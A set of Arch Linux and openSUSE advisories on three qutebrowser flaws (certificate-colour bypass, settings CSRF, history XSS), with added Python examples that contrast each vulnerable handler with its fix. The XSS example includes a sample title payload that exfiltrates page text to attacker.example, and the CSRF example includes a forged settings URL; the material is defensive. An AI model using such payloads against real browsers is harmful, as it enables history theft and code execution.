Arch Linux Security Advisory ASA-202005-5
========================================

Severity: Low
Date    : 2020-05-07
CVE-ID  : CVE-2020-11054
Package : qutebrowser
Type    : certificate verification bypass
Remote  : Yes
Link    : https://security.archlinux.org/AVG-1152

Summary
=======

The package qutebrowser before version 1.11.1-1 is vulnerable to certificate verification bypass.

Resolution
==========

Upgrade to 1.11.1-1.

# pacman -Syu "qutebrowser>=1.11.1-1"

The problem has been fixed upstream in version 1.11.1.

Workaround
==========

* Treat any host with a certificate exception as insecure, ignoring the URL color
* Or set content.ssl_strict to True (instead of 'ask'), preventing certificate exceptions in the configuration

Description
===========

In qutebrowser before version 1.11.1 there is an issue where, after a certificate error was overridden by the user, qutebrowser displays the URL as yellow (colors.statusbar.url.warn.fg). However, when the affected website was subsequently loaded again, the URL was mistakenly displayed as green (colors.statusbar.url.success_https). While the user has already seen a certificate error prompt at this point (or set content.ssl_strict to false, which is not recommended), this could still provide a false sense of security.

Impact
======

The user might think the webpage is secure, when in reality it has an invalid certificate.

References
==========

https://github.com/qutebrowser/qutebrowser/commit/6821c236f9ae23adf21d46ce0d56768ac8d0c467
https://github.com/qutebrowser/qutebrowser/commit/556fe81b3146e5cd2e77df9d8ce57aebbbd72eac
https://github.com/qutebrowser/qutebrowser/security/advisories/GHSA-4rcq-jv2f-898j
https://security.archlinux.org/CVE-2020-11054

LinuxSecurity.com Team
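The failure mode above is a state-tracking one: the URL colour was derived from whether a certificate error was raised on the current load, but once the user had accepted an exception the browser no longer raised one, so the second load of the same host looked clean. The following is an added example (not qutebrowser's code) that models that logic and the first workaround, "treat any host with a certificate exception as insecure". The class names, the `cert_exceptions` set, the `load`/`colour` methods and the status strings are assumptions for the illustration; the option names in the comments are the ones the advisory cites.

```python
from urllib.parse import urlparse


class VulnerableStatusBar:
    """Colours the URL from the errors raised on the current load only."""

    def __init__(self, ssl_strict="ask"):
        # Assumed to mirror content.ssl_strict: True blocks, "ask" prompts.
        self.ssl_strict = ssl_strict
        self.cert_exceptions = set()   # hosts whose certificate error was accepted

    def load(self, url, cert_invalid, user_accepts=True):
        """Simulate a page load; returns the status colour the bar would show."""
        parts = urlparse(url)
        host = parts.hostname
        error_this_load = False
        if cert_invalid and parts.scheme == "https" and host not in self.cert_exceptions:
            if self.ssl_strict is True or not user_accepts:
                return "blocked"
            # Exception remembered: later loads of this host raise no prompt
            # and, crucially, no error event either.
            self.cert_exceptions.add(host)
            error_this_load = True
        return self.colour(parts.scheme, host, error_this_load)

    def colour(self, scheme, host, error_this_load):
        if error_this_load:
            return "warn"               # colors.statusbar.url.warn.fg
        if scheme == "https":
            return "success_https"      # colors.statusbar.url.success_https
        return "success_http"


class FixedStatusBar(VulnerableStatusBar):
    """Also consults the stored exceptions, as the advisory's first
    workaround tells the user to do by hand."""

    def colour(self, scheme, host, error_this_load):
        if error_this_load or host in self.cert_exceptions:
            return "warn"
        return super().colour(scheme, host, error_this_load)


def insecure_hosts(bar):
    """Hosts the user should regard as insecure regardless of URL colour."""
    return sorted(bar.cert_exceptions)
```

The second `load()` of the same host on `VulnerableStatusBar` returns `success_https`, while `FixedStatusBar` keeps returning `warn`; with `ssl_strict=True` no exception is ever stored, which is the second workaround.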
openSUSE Security Update: Security update for qutebrowser
______________________________________________________________________________

Announcement ID:    openSUSE-SU-2018:2130-1
Rating:             moderate
References:         #1101507
Cross-References:   CVE-2018-1000559
Affected Products:  openSUSE Leap 42.3
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for qutebrowser fixes the following issues:

Security issue fixed:

- CVE-2018-1000559: Fix an XSS issue on qute://history (boo#1101507).

Patch Instructions:

To install this openSUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- openSUSE Leap 42.3:

  zypper in -t patch openSUSE-2018-774=1

Package List:

- openSUSE Leap 42.3 (noarch):

  qutebrowser-0.11.1-2.3.1

References:

https://www.suse.com/security/cve/CVE-2018-1000559.html
https://bugzilla.suse.com/1101507
Arch Linux Security Advisory ASA-201807-3
========================================

Severity: Critical
Date    : 2018-07-11
CVE-ID  : CVE-2018-10895
Package : qutebrowser
Type    : arbitrary code execution
Remote  : Yes
Link    : https://security.archlinux.org/AVG-735

Summary
=======

The package qutebrowser before version 1.4.1-1 is vulnerable to arbitrary code execution.

Resolution
==========

Upgrade to 1.4.1-1.

# pacman -Syu "qutebrowser>=1.4.1-1"

The problem has been fixed upstream in version 1.4.1.

Workaround
==========

It's possible to patch out the vulnerable code via a config.py file:

    from qutebrowser.browser import qutescheme

    # Replace the settings-write handler with one that changes nothing
    # and serves an empty page.
    qutescheme._qute_settings_set = lambda url: ('text/html', '')

Description
===========

Due to a CSRF vulnerability affecting the qute://settings page, it was possible for websites to modify qutebrowser settings. Via settings like editor.command, this possibly allowed websites to execute arbitrary code.

Impact
======

A remote attacker is able to execute code with a specially crafted web page.

References
==========

https://github.com/qutebrowser/qutebrowser/commit/43e58ac865ff862c2008c510fc5f7627e10b4660
https://github.com/qutebrowser/qutebrowser/issues/4060
https://security.archlinux.org/CVE-2018-10895
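The root cause is that an internal, privileged scheme accepted state-changing requests from any origin that could make the browser navigate to it. The following is an added example (not qutebrowser's code) showing the unprotected handler beside one that requires a per-process secret which only the browser's own settings page embeds, plus a function that mirrors the monkeypatch workaround. The `SettingsScheme` class, the `settings/set` path, the `option`, `value` and `csrf` query parameters and the sample values are assumptions for the illustration; the page states only that qute://settings lacked CSRF protection and that editor.command was a path to code execution.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlparse


class Settings(dict):
    """Minimal stand-in for the browser's configuration store."""


class SettingsScheme:
    """Handler for a hypothetical qute://settings/set?option=..&value=.. URL."""

    def __init__(self, settings):
        self.settings = settings
        # Random per-process secret. Only pages the browser renders itself
        # (the settings page below) ever learn it, so a third-party site that
        # navigates to the set URL cannot supply it.
        self.token = secrets.token_urlsafe(32)

    def render_settings_page(self):
        """The browser's own page embeds the token in its form."""
        return ('<form action="qute://settings/set">'
                f'<input type="hidden" name="csrf" value="{self.token}">'
                '<input name="option"><input name="value"></form>')

    def handle_set_unprotected(self, url):
        """Pre-fix behaviour: any navigation to the URL applies the change."""
        q = parse_qs(urlparse(url).query)
        self.settings[q["option"][0]] = q["value"][0]
        return True

    def handle_set(self, url):
        """Post-fix behaviour: refuse unless the request carries the secret."""
        q = parse_qs(urlparse(url).query)
        supplied = q.get("csrf", [""])[0]
        if not hmac.compare_digest(supplied, self.token):
            return False          # forged cross-origin request: ignored
        self.settings[q["option"][0]] = q["value"][0]
        return True


def apply_workaround(scheme):
    """Mirrors the advisory's config.py monkeypatch: the write handler is
    swapped for one that never touches settings."""
    scheme.handle_set_unprotected = lambda url: False


# Constructed sample: the URL an attacker's page would make the browser open.
FORGED = "qute://settings/set?option=editor.command&value=attacker-chosen-command"
```

`handle_set_unprotected(FORGED)` silently rewrites `editor.command`; `handle_set` rejects the same URL and accepts it only once the token from `render_settings_page()` is attached. Comparing with `hmac.compare_digest` keeps the check constant-time, which matters little for a local scheme but costs nothing.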
Arch Linux Security Advisory ASA-201806-13
=========================================

Severity: Medium
Date    : 2018-06-26
CVE-ID  : CVE-2018-1000559
Package : qutebrowser
Type    : cross-site scripting
Remote  : Yes
Link    : https://security.archlinux.org/AVG-724

Summary
=======

The package qutebrowser before version 1.3.3-1 is vulnerable to cross-site scripting.

Resolution
==========

Upgrade to 1.3.3-1.

# pacman -Syu "qutebrowser>=1.3.3-1"

The problem has been fixed upstream in version 1.3.3.

Workaround
==========

None.

Description
===========

qutebrowser before 1.3.3 contains a Cross Site Scripting (XSS) vulnerability that can result in a website stealing the user's browsing history. This attack can be exploited by tricking the victim into opening a page with a specially crafted attribute, and then opening the qute://history site via the :history command.

Impact
======

A remote attacker is able to steal the browser history with a specially crafted web page title.

References
==========

https://github.com/qutebrowser/qutebrowser/commit/4c9360237f186681b1e3f2a0f30c45161cf405c7
https://github.com/qutebrowser/qutebrowser/issues/4011
https://security.archlinux.org/CVE-2018-1000559
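Both the openSUSE update above and this advisory describe the same bug class: attacker-controlled page titles written into the privileged qute://history document without escaping, so script in a title runs with access to the whole history listing. The following is an added example (not qutebrowser's code) that renders a history page the vulnerable way and the escaped way; the `HistoryEntry` record, the function names and the sample entries are constructed for the illustration.

```python
import html
from dataclasses import dataclass


@dataclass
class HistoryEntry:
    url: str
    title: str   # taken from the visited site's <title>: attacker-controlled


# Constructed samples: one ordinary visit and one whose title carries markup.
BENIGN = HistoryEntry("https://example.org/", "Example Domain")
MALICIOUS = HistoryEntry(
    "https://attacker.example/",
    '<img src=x onerror="fetch(\'https://attacker.example/?h=\'+document.body.innerText)">',
)


def render_history_vulnerable(entries):
    """Interpolates url and title verbatim, so a crafted title becomes
    live markup inside the privileged history page."""
    rows = "".join(f'<li><a href="{e.url}">{e.title}</a></li>' for e in entries)
    return f"<ul>{rows}</ul>"


def render_history_fixed(entries):
    """Escapes at output time, for both the attribute and the text context.
    quote=True also neutralises quotes, so the url attribute cannot be
    broken out of either."""
    rows = "".join(
        f'<li><a href="{html.escape(e.url, quote=True)}">'
        f'{html.escape(e.title, quote=True)}</a></li>'
        for e in entries
    )
    return f"<ul>{rows}</ul>"


def title_survives_raw(render, entry):
    """True if the title reached the page unchanged, i.e. as markup."""
    return entry.title in render([entry])
```

With `render_history_vulnerable` the `<img onerror=...>` tag lands in the page as-is and fires when the user runs `:history`; with `render_history_fixed` it is rendered as text. Escaping belongs at the point of output, in the context the value is inserted into, not at the point where the title is recorded.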